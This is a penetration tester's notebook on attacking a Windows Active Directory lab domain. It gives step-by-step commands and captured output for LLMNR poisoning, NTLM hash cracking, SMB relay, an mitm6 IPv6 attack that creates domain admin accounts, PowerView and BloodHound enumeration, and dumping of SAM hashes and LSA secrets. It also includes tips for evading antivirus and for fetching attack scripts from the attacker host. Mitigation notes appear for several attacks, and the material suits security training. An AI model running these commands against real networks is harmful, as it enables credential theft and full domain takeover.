Domain Controller and Active Directory Tools.ctb

Domain Controller + Active Directory Techniques USEFUL COMMANDS Useful Article: https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018edition-82259ab73aaa Discover SMB Ports with Signing disabled (or not required) sudo nmap --script=smb2-security-mode -p445 192.168.2.0/24 --open Hashcat Password cracking. syntax: hashcat -m [module number of hashtype] filetocrack.txt passwordlist.txt trick: to find it easier we can do for example: hashcat --help | grep NTLM └──╼ $hashcat --help | grep NTLM 5500 | NetNTLMv1 / NetNTLMv1+ESS 5600 | NetNTLMv2 1000 | NTLM | Network Protocols | Network Protocols | Operating System There is also a collab tool for Google compute (super fast): https://kalilinuxtutorials.com/colabcat/ hashcat -m 1000 -o pwned.txt -r OneRuleToRuleThemAll.rule hash1.txt /root/wordlists/SecLists/Passwords/Leaked-Databases/ *.txt Wordlists Here we have a huge amount of wordlists that could be use with hashcat: https://github.com/danielmiessler/SecLists Responder This is part of the impacket toolkit. This one works pretty well to capture NTLM Hashes. sudo responder -I eth0 rdwv If you want to use it with ntlmrelay, disable the following: /etc/responder/Responder.conf SMB off HTTP off • Good idea is to run it early in the morning or while people is at lunch. We need traffic in the network for this to work. ------------------------------------------------------------------------------- 1/33 ntlmrelay.py This one relays to a server that has signing disabled or not required. • SMB Signing must be disabled on the target machine • Relayed user credentials must be admin on machine. 1) Start Responder 2) ntlmrelay -tf targets.txt -smb2support (this one just get hashes) 3) ntlmrelay -tf targets.txt -smb2support -i (this one provides an interactive shell) -------------------------------------------------------------------------------psexec to start a remote conection to a machine once we have valid credentials: psexec.py domain/user:password@ipaddress also there is a metasploit version (not so recommended) -------------------------------------------------------------------------------mitm6 This one is awesome since besides capturing hashes it could create a new user as a domain admin. It does everything through IPv6 1) run mitm6 -d domain 2) ntlmrelayx.py -6 -t ldaps://domainipaddress -wh fakewpad.domain -l lootme everything is going to be saved in the “lootme” directory. -------------------------------------------------------------------------------bloodhound-python This is pretty useful once we have valid credentials on the system since we can extract groups, users, privileges, etc of the domain controller and AD. example: bloodhound-python -d marvel.local -u fcastle -p Password1 -gc hydra-dc.marvel.local -c all -ns 192.168.2.200 ----------------------------------------------------------------------------------One Liner downloads with PowerShell Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip" Diagram of the network to attack 2/33 Attack Vectors - LLMNR Poisoning 1) LLMNR Poisoning LLMNR is link local multicast name resolution. This is basically “dns” it identifies hosts when dns fails to do so. Previously known as NBT-NS Key Flaw is that the service utilize a user's username and NTLMv2 hash when appropriately responded to. Capturing NTLM Hashes with Responder a) Make sure /etc/responder/Responder.conf has the following attributes set to “on”: ; Servers to start SQL = On SMB = On RDP = On Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = On HTTPS = On DNS = On LDAP = On b ) Start responder: 3/33 ──╼ $sudo responder -I eth0 -rdwv __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.0.0.0 Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR NBT-NS DNS/MDNS [ON] [ON] [ON] [+] Servers: HTTP server HTTPS server WPAD proxy Auth proxy SMB server Kerberos server SQL server FTP server IMAP server POP3 server SMTP server DNS server LDAP server RDP server [ON] [ON] [ON] [OFF] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [+] HTTP Options: Always serving EXE Serving EXE Serving HTML Upstream Proxy [OFF] [OFF] [OFF] [OFF] [+] Poisoning Options: Analyze Mode Force WPAD auth Force Basic Auth Force LM downgrade Fingerprint hosts [OFF] [OFF] [OFF] [OFF] [OFF] [+] Generic Options: Responder NIC Responder IP Challenge set Don't Respond To Names [eth0] [192.168.2.51] [random] ['ISATAP'] [+] Listening for events... C) As soon as someone tries to open a share, responder will capture the hashes: PC1 (THEPUNISHER) 4/33 5/33 EVIL HACKER MACHINE This is what we get on our attacker machine: - We just captured the fcastle user and the NTLMv2 Hash. Also it shows the IP address of the victim machine and the username. - We can proceed to crack this hash. Cracking the Hash 6/33 For this we can use “Hashcat” .. better if we use it not on a VM but on a Machine with a good graphic card. a) fcastle's hash is now saved in fcastle.txt file. b) cracking it with hashcat: └──╼ $sudo hashcat -m 5600 fcastle.txt /usr/share/wordlists/rockyou.txt --force hashcat (v6.1.1) starting... FCASTLE::MARVEL:763d0f88b64d6524:f1f9cbcabb6f218e8e2a99a2b8e06427:0101000000000000c0653150de09d2016 Username = fcastle Password = Password1 Mitigation: The best defense in this case is to disable LLMNR and NBT-NS. • To disable LLMNR, select “Turn OFF Multicast Name Resolution” under Local Computer Policy > Computer Configuration > Administratirve Templates > Network > DNS Client, in the Group Policy Editor. • To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced Tab > WINS tab and select “Disable NetBIOS over TCP/IP” If a Company must use or cannot disable LLMNR/NBT-NS, the best course of action is to: • Require Network Access Control • Require Strong user passwords to avoid cracking the hashes. Attack Vectors - SMB Relay 2) SMB Relay Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. Requirements • SMB Signing must be disabled on the target machine • Relayed user credentials must be admin on the target machine. SMB Signing is a packet level protocol. Signing says “you are not really that person so I won't let you in” If it is disabled it doesn't check for authenticity. For this, we need to turn off SMB and HTTP on /etc/responder/Responder.conf This attack can dump sensitive information like SAM Hashes SAM Hashes are like /etc/shadow in linux. We can take the hashes and crack them or use another vector “Pass the Hash” Attack Demonstration 1 1) Turn off SMB and HTTP on /etc/responder/Responder.conf 7/33 └──╼ $cat /etc/responder/Responder.conf [Responder Core] ; Servers to start SQL = On SMB = Off RDP = On Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = Off HTTPS = On DNS = On LDAP = On 2 ) Discover Hosts with SMB Signing disabled (or not required): └──╼ $sudo nmap --script=smb2-security-mode -p445 192.168.2.0/24 --open Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-25 14:11 CST Nmap scan report for 192.168.2.200 Host is up (0.0011s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: AE:9F:69:8D:2E:1C (Unknown) Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required Nmap scan report for 192.168.2.201 Host is up (0.0017s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 92:E9:84:60:FF:BA (Unknown) Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required Nmap scan report for 192.168.2.202 Host is up (0.0011s latency). PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 62:E3:D6:C5:AD:B8 (Unknown) Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required Nmap done: 256 IP addresses (11 hosts up) scanned in 8.24 seconds In this example, servers 192.168.2.201 and .202 have smb signing “enabled but not required” this is the same as having it disabled since it accepts both. 8/33 3 ) Create a file with targets: 192.168.2.201 and 202. > targets.txt 4 ) Boot up Responder the same way we did before: responder -I eth0 -rdwv 5 ) Start ntlmrelayx.py: └──╼ $sudo sudo ntlmrelayx.py -tf targets.txt -smb2support [sudo] password for marduk: Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Protocol Client SMTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. /usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release. from cryptography import x509 [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Running in relay mode to hosts in targetfile [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections 6 ) Now we wait for someone to connect to an SMB Share: 7) This is what we get on ntlmrelayx.py: [*] SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.201 [-] Authenticating against smb://192.168.2.201 as MARVEL/FCASTLE FAILED 9/33 [*] SMBD-Thread-4: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.202 [*] Authenticating against smb://192.168.2.202 as MARVEL/FCASTLE SUCCEED [*] SMBD-Thread-4: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, but there are no more targets left! [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xe2d0d1ee6b5099e79155664f8f7022fe [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:dcf8ac9223a8cf57291ed6abda2bc043::: Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0::: [*] Done dumping SAM hashes for host: 192.168.2.202 [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry We have the SAM Hash for user “Dead Pool” . We can crack this hashes or move laterally with those (pass the hash). Attack Demonstration 2 1) We start responder the same way (always with HTTP and SMB turned off) 2) We run the same NTLMRELAY.PY command but this time we will add a “-i” at the end... this would be for interactive session: 3) We wait for someone to connect to a share and see what happens: ntlmrelayx.py -tf targets.txt -smb2support -i [*] [*] [*] [*] [*] [*] Setting up HTTP Server Servers started, waiting for connections SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.202 Authenticating against smb://192.168.2.202 as MARVEL/FCASTLE SUCCEED Started interactive SMB client shell via TCP on 127.0.0.1:11000 SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, but there are no more targets left! 4) Now we can connect to it with Netcat!: nc 127.0.0.1:11000 └──╼ $nc 127.0.0.1 11000 Type help for list of commands # help open {host,port=445} - opens a SMB connection against the target host/port login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes logoff - logs off shares - list available shares use {sharename} - connect to an specific share cd {path} - changes the current directory to {path} lcd {path} - changes the current local directory to {path} pwd - shows current remote directory password - changes the user password, the new password will be prompted for input ls {wildcard} - lists all the files in the current directory rm {file} - removes the selected file 10/33 mkdir {dirname} - creates the directory under the current path rmdir {dirname} - removes the directory under the current path put {filename} - uploads the filename into the current path get {filename} - downloads the filename from the current path mount {target,path} - creates a mount point from {path} to {target} (admin required) umount {path} - removes the mount point at {path} without deleting the directory (admin required) list_snapshots {path} - lists the vss snapshots for the specified path info - returns NetrServerInfo main results who - returns the sessions currently connected at the target host (admin required) close - closes the current SMB Session exit - terminates the server process (and this session) We have all those options... so basically we can upload, download, change the password of the local user, making directories, remove them, check the shares etc. 5 ) Let's check the shares and navigate on the system: # shares ADMIN$ C$ IPC$ pparkershare # use C$ # ls drw-rw-rw0 drw-rw-rw0 -rw-rw-rw- 858882048 -rw-rw-rw- 1476395008 drw-rw-rw0 drw-rw-rw0 drw-rw-rw0 drw-rw-rw0 drw-rw-rw0 drw-rw-rw0 -rw-rw-rw- 268435456 drw-rw-rw0 drw-rw-rw0 drw-rw-rw0 Thu Wed Thu Thu Wed Thu Wed Wed Thu Wed Thu Thu Thu Thu Oct Oct Oct Oct Oct Oct Oct Oct Oct Oct Oct Oct Oct Oct 22 21 22 22 21 22 21 21 22 21 22 22 22 22 03:47:35 00:48:56 08:33:28 08:33:33 01:21:18 03:25:01 00:30:06 01:21:18 03:07:29 00:00:12 08:33:33 03:50:31 03:46:55 16:53:08 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 2020 $Recycle.Bin Documents and Settings hiberfil.sys pagefile.sys PerfLogs pparkershare Program Files Program Files (x86) ProgramData Recovery swapfile.sys System Volume Information Users Windows ... and we can do the same with all the shares. Attack Demonstration 3 1) Same thing as before, we start responder, we start ntlmrelayx.py but this time with the following command: ntlmrelayx.py -tf targets.txt -smb2support -e meterpreter.exe This way we can start a meterpreter shell on the victim machine and then just set metasploit to listen for the connection back with multihandler. 2 ) We can add instead of -e , -c to specify a command to run on the server , etc. (reverse shells and so on) 11/33 SMB Relay Mitigations SMB Relay Mitigations • Enable SMB Signing on all devices ◇ Pro: Completely stops the attack ◇ Con: Can cause performance issues with file copies • Disable NTLM Authentication on Network: ◇ Pro: Completely stops the attack ◇ Con: If Kerberos stops working, Windows defaults back to NTLM • Account Tiering: ◇ Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA) ◇ Con: Enforcing the policy may be difficult • Local Admin Restriction: ◇ Pro: Can Prevent a lot of lateral movement ◇ Con: Potential increase in the amount of service desk tickets Gaining Shell Access Gaining Shell Access What to do now we have credentials? if we have SMB opened and some credentials, we can definitely get shells with psexec on metasploit or the regular psexec. 1) Metasploit. Launch msfconsole: msf5 use exploit/windows/smb/psexec > options • Here we select the options for Rhosts, Rport, SMBDomain, SMBUser and SMBPass • once those are selected, we setup the payload : set payload windows/x64/meterpreter/reverse_shell • Setup the lhost options and lport and then run the exploit. The downside is that most of the time this is caught by AV. 2) psexec: └──╼ $sudo psexec.py marvel.local/fcastle:Password1@192.168.2.201 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 192.168.2.201..... [*] Found writable share ADMIN$ [*] Uploading file CWcRFghr.exe [*] Opening SVCManager on 192.168.2.201..... [*] Creating service oPtO on 192.168.2.201..... [*] Starting service oPtO..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.18363.418] (c) 2019 Microsoft Corporation. All rights reserved. C:\Windows\system32> It is better to try with psexec instead of the psexec option in metasploit. Most of the time this is not detected. Some other alternatives would be wmiexec.py or smbexec.py (less noisy) 12/33 ***** PSEXEC is noisy with AV. IPV6 Attacks IPV6 Attacks - DNS TakeOver Attack Resources: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ In this example the attacker poses as a DNS for IPV6. The issue here is that when it happens it can capture authentications to the domain controller via LDAP or SMB. On this example after rebooting the machine it logs into the domain controller.... and we can potentiallly use this attack to create a new machine, new user etc. We get hashes etc. With this attack also we do LDAP Relay to log as the domain administrator, create an account with admin privilege. The Attack 1) We boot mitm6: mitm6 -d marvel.local we will start getting replies from devices in our network. Then we send a relay attack: 2) ntlmrelayx.py ntlmrelayx.py -6 -t ldaps://192.168.2.200 (this is the domain controller ip) -wh fakewpad.marvel.local -l lootme -6 : for ipv6 -t ldaps:// : To relay to ldap -wh : to use a fake wpad -l : which directory to save the loot. └──╼ $sudo mitm6 -d marvel.local /usr/lib/python2.7/dist-packages/scapy/config.py:384: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release. import cryptography Starting mitm6 using the following configuration: Primary adapter: eth0 [00:0c:29:df:8c:70] IPv4 address: 192.168.2.51 IPv6 address: fe80::532d:fcb0:7aff:4c9c DNS local search domain: marvel.local DNS whitelist: marvel.local └──╼ $sudo ntlmrelayx.py -6 -t ldaps://192.168.2.200 -wh fakewpad.marvel.local -l lootme [sudo] password for marduk: Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] [*] [*] [*] [*] Protocol Protocol Protocol Protocol Protocol Client Client Client Client Client SMTP loaded.. SMB loaded.. LDAPS loaded.. LDAP loaded.. HTTPS loaded.. 13/33 [*] Protocol Client HTTP loaded.. /usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release. from cryptography import x509 [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections [*] HTTPD: Received connection from ::ffff:192.168.2.202, attacking target ldaps://192.168.2.200 [*] HTTPD: Client requested path: /wpad.dat 3) We reboot one of the machines so we speed up the process. Once it authenticates to the domain everything is going to be saced in the “lootme” directory. All that information will provide more insight on users, groups, domain users, computers etc on that domain. This is the output for domain_users_by_group.html: 4) With the same settings we currently have applied if a domain admin logs into any machine, we will have a new admin user created on the domain controller: [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [-] [-] [*] [*] [*] [-] [-] User privileges found: Adding user to a privileged group (Enterprise Admins) User privileges found: Modifying domain ACL Attempting to create user in: CN=Users,DC=MARVEL,DC=local Adding new user with username: YLpYSwjGkx and password: Ey//0zC'xX#+ssm result: OK Adding new user with username: XcuwirENKY and password: ehR%DrH+766`XOt result: OK Querying domain security descriptor Querying domain security descriptor Success! User YLpYSwjGkx now has Replication-Get-Changes-All privileges on the domain Try using DCSync with secretsdump.py and this user :) Saved restore state to aclpwn-20201025-155400.restore New user already added. Refusing to add another Unable to escalate without a valid user, aborting. Success! User XcuwirENKY now has Replication-Get-Changes-All privileges on the domain Try using DCSync with secretsdump.py and this user :) Saved restore state to aclpwn-20201025-155401.restore New user already added. Refusing to add another Unable to escalate without a valid user, aborting. As we can see, a new user has been created: 14/33 [*] Adding new user with username: YLpYSwjGkx and password: Ey//0zC'xX#+ssm result: OK [*] Adding new user with username: XcuwirENKY and password: ehR%DrH+766`XOt result: OK We can confirm this on the Domain Controller: Notes We can run this mitm6 with option --delegate-access. This could add a new computer, impersonate users on that computer (delegate acccess or delegate impersonator attack). Mitigation Strategies Mitigation Strategies 1. IPV6 Poisoning abuses the fact that windows queries for an IPv6 Address even in IPv4 only environments. If you don't use IPv6 internally, the safest way to prevent this mitm6 attack is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policies. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to block instead of allow prevents the attack from working: ◇ (inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-in) ◇ (inbound) Core Networking - Router Advertisement (ICMPv6-in) ◇ (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-Out) 2. If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHTTPAutoProxySvc Service. 3. Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP Channel Binding. 4. Consider Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegations 15/33 Post Compromise Enumeration For this we will be using Powerview and Bloodhound. PowerView CheatSheet: This is good for Domain Enumeration. https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 This is part of PowerShellMafia. Can be downloaded from: https://github.com/PowerShellMafia/PowerSploit Bloodhound Bloodhound could be use to visualize the information. Visualize the shortest path for compsomise. To Install it : a) apt install neo4j b) sudo neo4j start c) log into the server 127.0.0.1 and the port it provides. Change the password. d) pip install bloodhound, pip3 install bloodhound. PowerView Enumeration Enumeration with PowerView CheatSheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 This will be performed once we have access to one of the computers in the domain. 1) Once we are inside the target machine. We download powerview.ps1 into it. I like doing it with a one liner powershell script: Invoke-WebRequest "https://example.com/powerview.ps1" -OutFile “C:\Windows\Temp\powerview.ps1” In my example the result would be: Invoke-WebRequest "http://192.168.2.51:9090/powerview.ps1" -OutFile powerview.ps1 16/33 To bypass execution policy I use “powershell -ep bypass” 2) We call our program by doing: . .\PowerView.ps1 Sometimes it is possible that the AV blocks it. This is a good article to bypass the AV: https://www.cyberguider.com/bypassing-av-cat-vs-mouse/ In this case it works fine: 3) These are some of the commands that we can run: - Get-NetDomain : Information about the domain: Information about Domain Controllers, Children, Domain Mode, Level, Parent etc. - Get-NetDomainController: Gives the IP of the domain Controller, Name, etc. (for example an exploit asks for the ip on the domain controller, this is useful) - Get-DomainPolicy: This will show all the policies in the domain. - (Get-DomainPolicy)."systemaccess": In case we want to check the systemaccess policy. For example if minimumpasswordlength is 7 this would help us to start a password spraying attack with 7 characters. - Get-NetUser: This is a little dirty but shows us all the information about the users. Sam Accounts, descriptions, etc. - Get-NetUser | select cn : this will pull out just the usernames - Get-NetUser | select samaccountname: just the sam accounts. - Get-NetUser | select description : Just gets the descriptions (good way to find pwds in descriptions) 17/33 With all the previous information we can check if time it takes for a pwd to expire etc. - Get-UserProperty: This will show us all the properties a user may have. - Get-UserProperty -Properties pwdlastset: This will show when the password was last set for all users. - Get-UserProperty -Properties logoncount: If we see users never logging that could be a honeypot account. - Get-UserProperty -Properties badpwdcount: We see who gets wrong with their password more frequently or probably dictionary attacks. We can also get computers: - Get-NetComputer: shows all the computers in the domain - Get-NetComputer -FullData : This will show us more info. Operating systems etc. - Get-NetComputer -FullData | select OperatingSystem: Shows us what are the servers, windows 10 machines etc. We can also look at groups: - Get-NetGroup: shows all the groups Get-NetGroup -GroupName “Domain Admins”: Shows all the domain admins Get-NetGroup -GroupName *admin* Get-NetGroupMember -GroupName “Domain Admins”: We get the members of the domain admins. PowerView also has a feature: Invoke-ShareFinder This will show all the files shared in the network and from which computer. Group Policies: - Get-NetGPO: This shows us all the group policies. (dirty) - Get-NetGPO | select displayname, whenchanged: This gives us an idea of what is going on.. what has been disabled, enabled etc. BloodHound BloodHound (https://github.com/BloodHoundAD/BloodHound) is an application used to visualize active directory environments. The front-end is built on electron and the back-end is a Neo4j database, the data leveraged is pulled from a series of data collectors also referred to as ingestors which come in PowerShell and C# flavours. Ingestors: - bloodhound-python : to install just to a pip3 install bloodhound, pip install bloodhound. Syntax / example: bloodhound-python -d marvel.local -u fcastle -p Password1 -gc hydra-dc.marvel.local -c all -ns 192.168.2.200 - Sharphound (written in C#): In this example we will use sharphound. 1 ) Ingesting the data: Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1" OutFile "SharpHound.ps1" Once it is on the server. 18/33 2 ) powershell -ep bypass 3 ) . .\SharpHound.ps1 4 ) Invoke-BloodHound -CollectionMethod All -Domain Marvel.local -ZipFileName file.zip 5) Once the data is extracted, we move it to our attacker machine and input the zip file into bloodhound so it looks like this: We can do many queries with it like: 19/33 Attacking Active Directory - Post Compromise Attacks Post Compromise Attacks For previous attacks we needed to have a credential for the attack to be effective. Here we use : - Pass the hash - Pass the password - Token Impersonation - Kerberoasting - GPP password attacks 20/33 - Golden Ticket Attacks. Useful Tools - Crackmapexec: CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. Syntaxes: - crackmapexec smb 192.168.2.0/24 working on some other boxes. - crackmapexec smb 192.168.2.0/24 - crackmapexec smb 192.168.2.0/24 - crackmapexec smb 192.168.2.0/24 -d . to authenticate locally) -u fcastle -d MARVEL.local -p Password1 : to check if the same domain credentials are -u fcastle -d MARVEL.local -p Password1 --sam : To dump SAM hashes. -u fcastle -d MARVEL.local -p Password1 --lsa : to dump LSA hashes -u 'Frank Castle' -d . -H 64f12cddaa88057e06a81b54e73b949b (pass the hash -- notice the - SecretDump This is a tool to dump SAM and LSA hashes once we have a valid account on the system. Syntaxes: - secretsdump.py domain/user:password@ipaddress Kerberoasting: Syntax: - GETUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of DC> -request If you get a clock error skew.... do a ntpdate <IP of DC> Mimikatz • Tool used to view and steal credentials, generate kerberos tickets, leverate attacks. • Dump Credentials stored in memory • Just a few attacks: Credential Dumping, Pass-The-Hash, Over-Pass-The-Hash, Pass-The-Ticket, Golden Ticket, Silver Ticket. Pass The Hash / Pass the Password Pass the Hash / Pass the Password If we crack a password and / or can dump the SAM hashes, we can leverage both for lateral movement in networks. We could crack the hashes and obtain passwords or just pass the hashes. Attack Scenarios: a) Pass the password 1) Let's say we capture the credentials for fcastle with password: Password1. 21/33 This shows that with the fcastle user we were able to access 2 computers with that username and password: “THEPUNISHER” and “DEADPOOL” 2 ) Another cool stuff is that also we can try to dump the SAM hashes just by adding the modifier --sam at the end: As we can see here we have local users: "Frank Castle" and “Dead Pool” with their sam hashes. 3 ) Same as previously if we add --lsa at the end, we get the LSA hashes: 4 ) With this information we can use psexec to log into the other box 192.168.2.202 for example: 22/33 DO NOT DO Password Spraying with domain accounts since this could lock up users. This works perfectly with local accounts that could have been setup in several machines. Or once we are sure we have a valid password for a domain account and want to check where it works. SecretsDump - Extracting SAM Hashes, LSA Secrets etc SecretDump This is a tool to dump SAM and LSA hashes once we have a valid account on the system. Attack Since we know that fcastle is a local admin in both THEPUNISHER and DEADPOOL machines. We run SecretDump on both to extract SAM hashes: └──╼ $secretsdump.py marvel.local/fcastle:Password1@192.168.2.201 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0x016e2d195a2db0675adff82489bc5148 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d70f0fb48151bd2b4ffee17f14fb99b0::: Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c [*] Dumping LSA Secrets [*] $MACHINE.ACC MARVEL\THEPUNISHER$:aes256-cts-hmacsha1-96:17239c3f701cd57e12367cb1f342659b76966971f0c35fb51347c47b0c2f6ff0 MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:62f38eebe41177089791d09747547741 MARVEL\THEPUNISHER$:des-cbc-md5:9bfb024361fea280 23/33 MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:0c5c3921c06bc38c1ef0ccdda874a93f::: [*] DPAPI_SYSTEM dpapi_machinekey:0x2064356a9a46521edc236b388df6e7ce55dfcdb9 dpapi_userkey:0xd6c291cd029b66853a0844330afbfa47ca6c36d4 [*] NL$KM 0000 60 E0 01 5F 82 E8 1D 29 69 0C 0D 69 E0 3A 28 EF `.._...)i..i.:(. 0010 FD FD 45 10 53 59 53 7D BD 17 1A 60 34 8F 3F A2 ..E.SYS}...`4.?. 0020 D5 D3 E7 2E A9 88 57 BC 15 31 11 55 61 09 23 8D ......W..1.Ua.#. 0030 A8 0F 60 0C 59 67 C7 07 DE 55 70 D2 2A F8 9C 4C ..`.Yg...Up.*..L NL $KM:60e0015f82e81d29690c0d69e03a28effdfd45105359537dbd171a60348f3fa2d5d3e72ea98857bc153111556109238 [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry ┌─[marduk@periquito]─[~/Toys/PyFuscation] └──╼ $secretsdump.py marvel.local/fcastle:Password1@192.168.2.202 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Service RemoteRegistry is disabled, enabling it [*] Starting service RemoteRegistry [*] Target system bootKey: 0xe2d0d1ee6b5099e79155664f8f7022fe [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:dcf8ac9223a8cf57291ed6abda2bc043::: Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c MARVEL.LOCAL/pparker:$DCC2$10240#pparker#36a5d54b17416e276a7ca65469fd56d8 MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f [*] Dumping LSA Secrets [*] $MACHINE.ACC MARVEL\DEADPOOL$:aes256-cts-hmacsha1-96:a19d8437d40449ecaccbfc12cd67775ff513ab432672fd781977ee2e71617f96 MARVEL\DEADPOOL$:aes128-cts-hmac-sha1-96:f4e09db58222ec1fa57af5ba24ceb356 MARVEL\DEADPOOL$:des-cbc-md5:badcea4c64f491d3 